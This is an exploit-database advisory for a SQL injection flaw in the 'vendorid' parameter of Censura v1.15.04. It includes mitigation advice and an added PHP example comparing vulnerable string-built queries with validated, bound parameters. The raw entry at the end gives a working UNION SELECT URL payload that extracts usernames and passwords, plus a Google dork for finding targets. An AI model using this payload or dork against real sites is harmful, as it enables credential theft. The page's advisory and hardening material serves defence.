vendor: Censura
by: milw0rm.com
N/A
CVSS
N/A
Remote SQL Injection
CWE
Product Name: Censura
Affected Version From: Censura v1.15.04
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:censura:censura:1.15.04
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

Censura v1.15.04 Remote SQL Injection

The vulnerability allows an attacker to perform a remote SQL injection attack by exploiting the 'vendorid' parameter in the 'censura.php' script. By manipulating the parameter, an attacker can execute arbitrary SQL queries and potentially retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Censura that addresses the SQL injection vulnerability. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.
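
The input validation and query handling recommended above, as an added example that is not Censura's code and not part of the original advisory: a hypothetical vendor lookup written first with string concatenation, then with strict integer validation and a bound parameter. The table layout, function names, and sample rows are constructed for illustration; the second sample value is a shortened form of the request value in the raw data below.

```php
<?php
// Added example: hypothetical handler, not Censura's code.
// Schema, names, and rows are constructed for illustration.

function open_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE vendors (id INTEGER PRIMARY KEY, name TEXT)');
    $db->exec('CREATE TABLE users (username TEXT, password TEXT)');
    $db->exec("INSERT INTO vendors VALUES (1, 'Acme')");
    $db->exec("INSERT INTO users VALUES ('admin', 'constructed-hash')");
    return $db;
}

// Weak form: the request value becomes part of the SQL text itself.
function vendor_info_weak(PDO $db, string $vendorid): array {
    return $db->query("SELECT id, name FROM vendors WHERE id = $vendorid")
              ->fetchAll(PDO::FETCH_NUM);
}

// Hardened form: accept only a positive integer, then bind it as data.
function vendor_info_safe(PDO $db, string $vendorid): array {
    $id = filter_var($vendorid, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('vendorid must be a positive integer');
    }
    $stmt = $db->prepare('SELECT id, name FROM vendors WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

$db = open_demo_db();
$samples = [
    '1',                                                            // legitimate id
    '-1/**/union/**/select/**/username,password/**/from/**/users',  // from this page, shortened
];
foreach ($samples as $v) {
    echo "weak($v): ", json_encode(vendor_info_weak($db, $v)), "\n";
    try {
        echo "safe($v): ", json_encode(vendor_info_safe($db, $v)), "\n";
    } catch (InvalidArgumentException $e) {
        echo "safe($v): rejected, ", $e->getMessage(), "\n";
    }
}
```

The bound parameter alone keeps the value out of the SQL text; the integer check additionally gives the application a clean rejection point that can be logged and alerted on.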

Exploit-DB raw data:

==============================================

Censura v1.15.04 (vendorid)  Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Exploit:
censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/

==============================================

google dork: "Powered by: Censura"

vendor: http://www.censura.info/  

==============================================

# milw0rm.com [2007-05-03]